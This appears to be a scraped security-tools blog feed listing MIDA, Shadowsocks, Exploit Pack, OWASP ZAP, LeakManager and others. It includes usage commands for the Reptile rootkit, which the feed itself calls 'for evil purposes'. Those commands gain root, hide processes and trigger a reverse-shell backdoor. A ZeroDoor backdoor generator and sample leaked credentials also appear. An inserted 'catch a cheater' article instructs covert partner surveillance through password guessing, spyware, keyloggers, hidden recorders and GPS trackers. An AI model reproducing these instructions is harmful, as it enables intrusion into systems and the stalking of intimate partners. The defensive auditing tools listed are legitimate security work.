  • TICKETURL_HEAD/TICKETURL_TAIL - If these are set ticket numberrs will be linked to this URL
  • SSHKEY1, SSHKEY2, SSHKEY3 .. SSHKEY9
    • The content of this environment variable will stored in the file /opt/seccubus/.ssh/SSHKEY1 etc.
    • You can use this mechanism to provide ssh keys that are used to start remote scans
  • HTTP_AUTH_HEADER - Set the http authentication header
    • If you are using something like OpenAM to authenticate your users, this allows you to set which http request header contains the user that OpenAM detected
  • TZ - Set the timezone of the container
  • TLS - Controls TLS behaviour yes means TLS is on, otherwise TLS is off. TLS is on by default.
  • JIT_GROUP - Controls JIT provisioning of users
  • CRON_MAIL_TO - Mail cron messages to this addres
  • CRON_* - Add these lines to crontab in alphabetical order

MIDA-Multitool - Bash Script Purposed For System Enumeration, Vulnerability Identification And Privilege Escalation

$
0
0

Bash script purposed for system enumeration, vulnerability identification and privilege escalation.
MIDA Multitool draws functionality from several of my previous scripts namely SysEnum and RootHelper and is in many regards RootHelpers successor.
Besides functionality from these two previous scripts it incorporates some of it's own and as such aims to be a comprehensive assistant for operations and utilities related to system enumeration, vulnerability identification, exploitation and privilege escalation.

Usage
After a system has been succesfully compromised MIDA should be downloaded to the host in question either with git or wget, after it has been unpacked/cloned the shellscript needs to be made executable with chmod +x mida.sh
Upon doing so it can be run on the target host. The options available to the user are below.
The 'Usage' option prints this informational message. The option 'System Enumeration' attempts to retrieve system information such as OS and kernel details, network status, processes, system logs and more. 'Common Utilities' checks for the existence of useful utilities such as telnet, netcat, tcpdump etc. 'External Utilities' opens a menu which lets you download external utilities that may prove to be helpful with further enumeration, vulnerability identification and privilege escalation.
Finally the option 'Cleartext Credentials' searches for text and web application files that contain certain keywords in order to find potential cleartext passwords.

Scripts available for download with MIDA


ShadowSocks ConnecTion - A Wrapper Tool For Shadowsocks To Consistently Bypass Firewalls

$
0
0
A wrapper tool for shadowsocks to consistently bypass firewalls.

Quick start

Automatically connect
The easiest way to run this tool is just type ssct in terminal, and ssct will acquire available shadowsocks servers from ishadowsocks and connect to it automatically.

Connect to a specific server
First, show all ss servers by --list option.
ssct --list
Then, connect to a specific server by -n option.
ssct -n 5
Alternatively, you can connect a custom server.
ssct -s <server_addr> -p <server_port> -l <local_port> -k <password> -m <method>

Usage

Requirements
1 Install shadowsocks
# for python2
pip install shadowsocks
# for python3
pip3 install shadowsocks
Note: You can also install shadowsocks with system package manager (apt, yum, dnf, etc) or just chrome app version shadowsocks. However, the chrom app version can't connect automatically.
2 Install python3 modules
pip3 install requests
pip3 install prettytable
Note: The module prettytable is optional, but would be better if installed.

Configuration for google chrome
  1. Install chrome extension SwitchyOmega.


  2. Open the options of SwitchyOmega, and configure as below.
  3. List servers and select one to connect, or just type ssct to connect automatically.
  4. Select proxy option in chrome and enjoy it.

Configuration for firefox
  1. Install firefox extension AutoProxy.
  2. AotoProxy preferences: Proxy Server --> Edit proxy server, and add shadowsocks item.
  3. Start ssct and select the shadowsocks proxy.
Note: For detail help here.

More options
optional arguments:
-h, --help show this help message and exit

ssct options:
-n <num> connect server number
--ss <ss> path to shadowsocks, assumed in the PATH
--list list all ss servers
--stop stop running servers
--version show program's version number and exit
--morehelp show this help message and exit

shadowsocks options:
-c <config> path to config file
-s <addr> server address, auto crawl online
-p <port> server port, auto crawl online
-b <addr> local binding address [default: 127.0.0.1]
-l <port> local port [default: 1080]
-k <password> password, auto crawl online
-m <method> encryption method, auto crawl online
-t <timeout> timeout in seconds [default: 300]
--fast-open use TCP_FASTOPEN, requires Linux 3.7+
-d <daemon> daemon mode, one of start, stop and restart
--pid-file <file> pid file for daemon mode
--log-file <file> log file for daemon mode
--user <user> username to run as
-v, -vv verbose mode
-q, -qq quiet mode, only show warnings/errors
Connect to the available server automatically without any argument.


Cloud Security Suite - One stop tool for auditing the security posture of AWS infrastructure

$
0
0

One stop tool for auditing the security posture of AWS.

Pre-requisites
Python 2.7
pip
git

Installation
git clone https://github.com/SecurityFTW/cs-suite.git
cd cs-suite/
sudo python setup.py
Note - Generate a set of ReadOnly AWS keys which the tool will ask to finish the installation process.

Virtual Environment installation
(So you don't mess with the already installed python libraries)
pip install virtualenvironmentwrapper
add it to the respective rc file of your shell (bashrc/zshrc) (for fish shell users check virtualfish)
echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bashrc
source the file
source ~/.bashrc
Run env:
cd cs-suite/
mkvirtualenv cssuite
workon cssuite
pip install -r requirements-virtual.txt
aws configure
Once installation is done, the tool will ask you for the AWS keys and region. These two are mandatory for the tool to work.

Run
python cs.py

Documentation
https://securityftw.github.io/Docs/

Videos

Installation and running CS Suite:

This is how you can audit a linux instance:

This is how you can audit a windows instance:


reflector - Burp plugin able to find reflected XSS on page in real-time while browsing on site

$
0
0
Burp Suite extension is able to find reflected XSS on page in real-time while browsing on web-site and include some features as:
  • Highlighting of reflection in the response tab.
  • Test which symbols is allowed in this reflection.
  • Analyze of reflection context.
  • Content-Type whitelist.

How to use
After plugin install you just need to start work with the tested web-application. Every time when reflection is found, reflector defines severity and generates burp issue.


Each burp issue includes detailed info about reflected parameter, such as:
  • Symbols that allowed in this reflection.
  • Highlighting of reflection value in response.
  • Reflection context analyze.

Allowed sybmols analyse


When the reflection is found and option "Aggressive mode" is activated, the reflector will check which of special-symbols are displayed on this page from vulnerable parameters. For this action, reflector compose additional requests for each reflected parameter. In example, while we was working with elkokc.ml website reflector are generated issue with a detailed information about reflection. There are 3 reflection for "search" parameter and each of them pass special symbols. Because of the possibility of displaying special characters issue severity is marked as high. Every time when reflection is found reflector define severity and generate burp issue.

Context analyse
In the "Check context" mode reflector it's not only show special characters that are reflected to the page, but also figure out a character that allows to break the syntax in the page code. In example you may see server response by reflector extension. Parameter "search" was send with a payload - p@y<"'p@y. As a result, it was reflected a few times in a different contexts.
  • reflection with next characters - ',", < and the double quote allow to exit from this context and write HTML code.
  • reflection with next characters - ", < and the bracket allow to inject HTML-tags.
  • reflection with next characters - ',", < and the single quote allow to exit from js variable context and write malicious code.

In the issue information it's marked as:
  • Context char - character that allows to breake the syntax.
  • Other chars - other chars that are reflected without context.

Reflection navigation
Navigation by arrow buttons in the response tab.


Settings
  • Scope only - allow reflector to work only with a scope added websites.
  • Agressive mode - reflector generates additional request with a test payload .
  • Check context - activate check context mode.
Moreover you can manage content-types whitelist with which reflector plugin should work. But if you will use another types except text/html, this can lead to slowdowns in work.


Exploit Pack - Penetration Testing Framework

$
0
0

Exploit Pack has been designed by an experienced team of software developers and exploit writers to automate processes so penetration testers can focus on what's really important. The threat. This blend of software engineers and subject matter experts provides an unique advantage by combining technical know-how with true insight into the problem set, resulting in more efficient solutions for cyber security surveillance.

Get an ISO/VM with Exploit Pack

Get an ISO or a VM with Exploit Pack already installed: Exploit Pack comes pre-installed in several Linux distributions, but our all time favorite is BlackArch, get it here: https://blackarch.org/downloads.html

Get/Update using GIT

After you install git in your desired platform, windows, osx, linux then you can simply run the following commands: To get Exploit Pack:
$ git clone https://github.com/juansacco/exploitpack.git
To update to the latest release: Navigate into Exploit Pack folder and run this command
$ git pull

Documentation

Please check our javadocs included under the folder with that name, also check our online guide, pdfs and the information all over the internet about this tool, feel free to make comments, integrate with our community and have fun!

Known issues:

Using Exploit Pack could produce addiction Prolonged periods of time using this tool could produce network mayhem or even dead In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.

Installation notes:

Windows:

Download and install Java 8 from Oracle:
Depending on your platform you have to choose between Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits After you have installed Java 8 in your system, get Exploit Pack from the official site, uncompress and double click ExplotPack.jar, if that does not work, try from a console using this command: "java -jar ExploitPack.jar"

Linux:
Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repository Copy and paste the following in a terminal window:
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

Then, get Exploit Pack trough GIT or download it from the official website. After that run it from a terminal using the following command: "java -jar ExploitPack.jar"

OSX:

Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits After you have Java 8 installed in your Mac, download Exploit Pack, uncompress and double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

BUILD OUTPUT DESCRIPTION

When you build an Java application project that has a main class, the IDE automatically copies all of the JAR files on the projects classpath to your projects dist/lib folder. The IDE also adds each of the JAR files to the Class-Path element in the application JAR files manifest file (MANIFEST.MF).

To run the project from the command line, go to the dist folder and type the following:
java -jar "ExploitPack.jar" 
To distribute this project, zip up the dist folder (including the lib folder) and distribute the ZIP file.

Notes:

  • If two JAR files on the project classpath have the same name, only the first JAR file is copied to the lib folder.
  • Only JAR files are copied to the lib folder.
  • If the classpath contains other types of files or folders, these files (folders) are not copied.
  • If a library on the projects classpath also has a Class-Path element specified in the manifest,the content of the Class-Path element has to be on the projects runtime path.
  • To set a main class in a standard Java project, right-click the project node in the Projects window and choose Properties. Then click Run and enter the class name in the Main Class field. Alternatively, you can manually type the class name in the manifest Main-Class element.


OWASP ZAP 2.6.0 - Penetration Testing Tool for Testing Web Applications

$
0
0

The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. Its also a great tool for experienced pentesters to use for manual security testing.

For general information about ZAP:
  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License
For help using ZAP:
Information about the official ZAP Jenkins plugin:
To learn more about ZAP development:

Justification
Justification for the statements made in the tagline at the top;)
Popularity:
  • ToolsWatch Annual Best Free/Open Source Security Tool Survey:
Contributors:


LeakManager - A Tool To Help You Manage Your Leaks

$
0
0

A Tool To Help You Manage Your Leaks

Install
sudo apt-get install mongodb-org screen
pip3 install -r requeriments.txt



Usage
screen -S leakManager
hug -f index.py -p 1337
OR
gunicorn index:__hug_wsgi__ -b 0.0.0.0:1337
OR
uwsgi --http 0.0.0.0:1337 --wsgi-file index.py --callable __hug_wsgi__
ctrl + a + d

Change user/passwd
edit etc/LeakManager.conf file

MassInsert
CSV Format
email,username,password,database

CSV Format example:
admin@admin.com,admin,admin1234,appXPTO
jose@admin.com,,zezin123,appXPTO
paula@admin.com,paula,123456,appXPTO
zika@admin.com,virus,nicole,appXPTO


How To Catch a Cheater

$
0
0

You have observed your partner and noticed some significant changes in behavior. They are more secretive about using their phone; they are working late or on the weekend; or they are not connecting with you like they used to. Do you have a cheater in the house? How can you find out? There are some old school methods and then there are some ways technology can help you with how to catch a cheater.

Tried and True from the Past

While some of these techniques may be a little too much cloak and dagger for you, they have worked many times in the past to catch cheaters. And they may suit your style of operation.

  1. Show up at a known location unexpectedly and assess the situation. Drop into the baseball practice to see if they are present. If they are not there, ask the team members about the absence. Listen carefully. Sometimes friends are willing to share their suspicions. Sometimes they try to cover up. If the suspected cheater is present, watch from a distance to see if anything is going on.
  2. Check the garbage and recycling in your home and at their work for incriminating evidence.
  3. Look through the phone bills, bank account statements, or charge card statements for charges that are suspicious. Are there restaurant charges that are unfamiliar?
  4. Check the odometer of the car to see if there is extra mileage that would signal extra trips to an unknown location.
  5. Set your spouse up by planning a trip (business or family) and then stay close to home to observe what is happening. Use a camera to log the evidence.
Technological Solutions   There are Apps for That! ???

You may want to use a technological solution for tracking behaviour for a variety of reasons. The evidence has already been recorded. All you have to do is locate it. It is easier to use technology, instead of a more physical solution. You will have evidence that you can use to confront the cheater. You are too embarrassed to go sneaking about. 
  1. Everyone's phone is full of personal information that is of a very telling nature. If you know the password, great. If you don't see if you can learn it by watching your partner unlock the phone. Or try some educated guesses. And then go through the phone looking for incriminating evidence. Review recent calls for repeated numbers, review the photos for people you don't know, look through messages and the app histories.
  2. If you can get into a computer your partner uses look for the same things you have done on the phone - any call history from programs like Skype and  also look at History on the web browser. Check out the photos there as well.
  3. On social media sites that are used by the cheater look for unusual items, such as a review of a restaurant you don't recognize and comments that don't make any sense to you, such as “Great Game with the Red Sox, Friday night.” when you thought working late was was the excuse.
  4. If you do not know the passwords, take advantage of the opportunity to loan your phone to your partner in hope that they forget to log out. Then you can use that  for access to complete searches.
  5. Installing tracking software on phones is another possibility, once you can get into the phone. Programs such as Contact Spy can track activity. Also you can track your spouse's cell phone by using the GPS function.
  6. If you can get access to the computer, you can install  software that will pull up incriminating  evidence such as key loggers that track keystrokes, 
  7. Make a fake idea for a dating website to see if you can find your partner there. If you are insistent, set up a date.
  8. Use an audio recording device in a location where the cheater usually talks on the phone set to voice activate for those conversation that you are not allowed to hear.  Many of these devices look like something else to make them appear to be innocuous. Put it in the home office, workshop, kitchen or bedroom.
  9. Put a hidden GPS on the car to track the journeys taken.

And if you need more details about how to do any of these technological solutions go to the app store where for less than $5, the app walk you through the process step by step. Now you have some strategies about how to catch a cheater. 

Read more:




Reptile - LKM Linux Rootkit

$
0
0

Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.

Features
  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Boot persistence
  • Heaven's door - A ICMP/UDP port-knocking backdoor
  • Client to knock on heaven's door :D

Install
apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Usage
Binaries will be copied to /reptile folder, that will be hidden by Reptile.

Getting root privileges
hax@Debian:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
hax@Debian:~$ /reptile/r00t
You got super powers!

root@Debian:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)

Hiding
  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide files contents: all content between the tags will be hidden
Example:
#<reptile> 
content to hide
#</reptile>

Knocking on heaven's door
Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Knock Knock on Heaven's Door
Writen by: F0rb1dd3n

Usage: ./knock_on_heaven <args>

-x protocol (ICMP/UDP)
-s Source IP address (You can spoof)
-t Target IP address
-p Source Port
-q Target Port
-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer
Some functions of this module is based on another rootkits. Please see the references!

References

ZeroDoor - A Script Written Lazily For Generating Cross-Platform Backdoors

$
0
0

A script written lazily for generating reverse shell backdoors on the go whenever you need without any hassle for your daily penetration needs . These backdoors are not James Bond high tech stuff but rather simple ones to prevent over exploitation and limited capabilities Once you generate the payload somehow execute on the concerned system either Win or nix based systems . Once executed you will have the capability of executing remote commands on the compromised host.

Usage
python zerodoor.py
Tiny Overview
Nothing special it includes three basic backdoor generation capability for :-
  1. Nix/OSX Based
  2. Windows Shit
Poweshell payload generation have been added due to its sofistication and presistence :)

Author
Souhardya Sardar is a lazy guy who keeps learning and gets trolled by experts Github :- github.com/Souhardya


Viewing all 5816 articles
Browse latest View live